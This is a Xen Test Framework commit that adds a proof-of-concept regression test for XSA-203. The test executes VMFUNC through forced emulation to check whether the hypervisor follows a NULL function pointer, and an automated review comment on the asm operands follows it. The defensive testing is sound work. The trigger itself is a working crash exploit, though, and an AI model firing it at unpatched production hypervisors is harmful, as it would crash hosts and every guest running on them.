XSA-203 PoC
authorAndrew Cooper <andrew.cooper3@citrix.com>
Fri, 9 Dec 2016 16:20:04 +0000 (16:20 +0000)
committerAndrew Cooper <andrew.cooper3@citrix.com>
Thu, 16 Feb 2017 18:01:32 +0000 (18:01 +0000)
Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox
tests/xsa-203/Makefile [new file with mode: 0644]
tests/xsa-203/main.c [new file with mode: 0644]

index 1feccb41ce213a4d17a84c82c12f44f96f95f73b..d88a874ed71760ca07befca769699d30b733ca7a 100644 (file)
@@ -80,6 +80,8 @@ address checks.
 @subpage test-xsa-200 - x86: CMPXCHG8B emulation fails to ignore operand size
 override.
 
+@subpage test-xsa-203 - x86: missing NULL pointer check in VMFUNC emulation.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-203/Makefile b/tests/xsa-203/Makefile
new file mode 100644 (file)
index 0000000..c6fb856
--- /dev/null
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-203
+CATEGORY  := xsa
+TEST-ENVS := hvm32
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-203/main.c b/tests/xsa-203/main.c
new file mode 100644 (file)
index 0000000..01b5bca
--- /dev/null
@@ -0,0 +1,41 @@
+/**
+ * @file tests/xsa-203/main.c
+ * @ref test-xsa-203
+ *
+ * @page test-xsa-203 XSA-203
+ *
+ * Advisory: [XSA-203](http://xenbits.xen.org/xsa/advisory-203.html)
+ *
+ * Versions of Xen between 4.6 (when VMFUNC support was introduced) and
+ * XSA-203, would follow a NULL function pointer on non-Intel hardware.
+ *
+ * Poke a VMFUNC at the instruction emulator, and see whether Xen falls over.
+ *
+ * @see tests/xsa-203/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-203 PoC";
+
+bool test_needs_fep = true;
+
+void test_main(void)
+{
+    asm volatile (_ASM_XEN_FEP
+                  "1: vmfunc; 2:"
+                  _ASM_EXTABLE(1b, 2b) /* Ignore #UD on older versions. */
+                  :: "a" (0));
+
+    /* If Xen is alive, it didn't fall over the NULL function pointer. */
+    xtf_success("Success: Not vulnerable to XSA-203\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
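Review bot: The asm statement in test_main loads only EAX, but VMFUNC leaf 0 (EPTP switching) takes its list index from ECX, so the emulator is handed whatever value the compiler happened to leave there. Pinning it with `:: "a" (0), "c" (0));` keeps the regression check reproducible across builds and on hosts where the instruction is actually handled. The comment `/* Ignore #UD on older versions. */` also reads narrower than the code: the extable fixup appears to swallow any fault at label 1, which presumably includes the one a patched Xen raises on hardware without VMFUNC, so `/* Tolerate a fault where VMFUNC is unavailable. */` would describe it better. Because the test reports success on both a fault and a clean return, the log cannot show which path ran; a one-line comment above xtf_success() saying so would save triage time.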